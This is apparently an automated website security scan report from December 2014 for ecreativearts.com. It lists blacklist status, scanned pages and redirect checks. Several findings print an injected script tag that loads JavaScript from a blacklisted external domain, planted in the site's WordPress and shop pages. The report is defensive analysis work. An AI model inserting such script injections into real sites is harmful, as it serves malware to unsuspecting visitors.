Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ecreativearts.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ecreativearts.com/ | 200 OK Content-Length: 3101 Content-Type: text/html | clean |
http://ecreativearts.com/?ND | 200 OK Content-Length: 3101 Content-Type: text/html | clean |
http://ecreativearts.com/?NA | 200 OK Content-Length: 3101 Content-Type: text/html | clean |
http://ecreativearts.com/?MA | 200 OK Content-Length: 3101 Content-Type: text/html | clean |
http://ecreativearts.com/?MD | 200 OK Content-Length: 3101 Content-Type: text/html | clean |
http://ecreativearts.com/?SA | 200 OK Content-Length: 3101 Content-Type: text/html | clean |
http://ecreativearts.com/?SD | 200 OK Content-Length: 3101 Content-Type: text/html | clean |
http://ecreativearts.com/?DA | 200 OK Content-Length: 3101 Content-Type: text/html | clean |
http://ecreativearts.com/?DD | 200 OK Content-Length: 3101 Content-Type: text/html | clean |
http://ecreativearts.com/zc/ | HTTP/1.1 302 Found Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Connection: close Date: Sat, 13 Dec 2014 01:16:28 GMT Location: http://ecreativearts.com/zc/nddbc.html Server: LiteSpeed Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.35 | clean |
http://ecreativearts.com/zc/nddbc.html | 200 OK Content-Length: 2447 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://seishinharikyu.han.kr/jyxpmq2d.php?id=6822121"></script> | ||
http://ecreativearts.com/zc/index.php?main_page=index | HTTP/1.1 302 Found Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Connection: close Date: Sat, 13 Dec 2014 01:16:29 GMT Location: http://ecreativearts.com/zc/nddbc.html Server: LiteSpeed Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.35 | clean |
http://ecreativearts.com/test404page.js | 404 Not Found Content-Length: 2991 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: seishinharikyu.han.kr ...[1083 bytes skipped]... itle="RSD" href="http://ecreativearts.com/wp/xmlrpc.php?rsd" /> <style type='text/css'> <!--#header { background: url('http://ecreativearts.com/wp/wp-content/themes/default/images/header-img.php?upper=DDFFDD&lower=DDDDFF') no-repeat bottom center; } #headerimg h1 a, #headerimg h1 a:visited, #headerimg .description { color: #3366CC; } --></style> <script type="text/javascript" src="http://seishinharikyu.han.kr/jyxpmq2d.php?id=6822116"></script> </head> <body> <div id="page"> <div id="header"> <div id="headerimg"> <h1><a href="http://ecreativearts.com/wp/">Creative Arts</a></h1> <div class="description">Just another WordPress weblog</div> </div> </div> <hr /> '); ?></a></h1> <div class="description">Just another WordP ...[1433 bytes skipped]... | ||
http://seishinharikyu.han.kr/jyxpmq2d.php?id=6822116 | 200 OK Content-Length: 4 Content-Type: text/html | clean |
http://seishinharikyu.han.kr/test404page.js | 404 Not Found Content-Length: 288 Content-Type: text/html | clean |
http://ecreativearts.com/wp/ | 200 OK Content-Length: 3762 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: seishinharikyu.han.kr ...[1083 bytes skipped]... itle="RSD" href="http://ecreativearts.com/wp/xmlrpc.php?rsd" /> <style type='text/css'> <!--#header { background: url('http://ecreativearts.com/wp/wp-content/themes/default/images/header-img.php?upper=DDFFDD&lower=DDDDFF') no-repeat bottom center; } #headerimg h1 a, #headerimg h1 a:visited, #headerimg .description { color: #3366CC; } --></style> <script type="text/javascript" src="http://seishinharikyu.han.kr/jyxpmq2d.php?id=6822116"></script> </head> <body> <div id="page"> <div id="header"> <div id="headerimg"> <h1><a href="http://ecreativearts.com/wp/">Creative Arts</a></h1> <div class="description">Just another WordPress weblog</div> </div> </div> <hr /> '); ?></a></h1> <div class="description">Just another WordP ...[2403 bytes skipped]... | ||
http://ecreativearts.com/wp/uncategorized/hello-world | 200 OK Content-Length: 5479 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: seishinharikyu.han.kr ...[1134 bytes skipped]... itle="RSD" href="http://ecreativearts.com/wp/xmlrpc.php?rsd" /> <style type='text/css'> <!--#header { background: url('http://ecreativearts.com/wp/wp-content/themes/default/images/header-img.php?upper=DDFFDD&lower=DDDDFF') no-repeat bottom center; } #headerimg h1 a, #headerimg h1 a:visited, #headerimg .description { color: #3366CC; } --></style> <script type="text/javascript" src="http://seishinharikyu.han.kr/jyxpmq2d.php?id=6822116"></script> </head> <body> <div id="page"> <div id="header"> <div id="headerimg"> <h1><a href="http://ecreativearts.com/wp/">Creative Arts</a></h1> <div class="description">Just another WordPress weblog</div> </div> </div> <hr /> '); ?></a></h1> <div class="description">Just another WordP ...[2708 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ecreativearts.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Dec 2014 01:16:25 GMT
Server: LiteSpeed
Content-Length: 3101
Content-Type: text/html
X-Powered-By: PHP/5.4.35
...3101 bytes of data.
GET / HTTP/1.1
Host: ecreativearts.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Dec 2014 01:16:25 GMT
Server: LiteSpeed
Content-Length: 3101
Content-Type: text/html
X-Powered-By: PHP/5.4.35
...3101 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ecreativearts.com
Referer: http://www.google.com/search?q=ecreativearts.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ecreativearts.com
Referer: http://www.google.com/search?q=ecreativearts.com
Result:
The result is similar to the first query. There are no suspicious redirects found.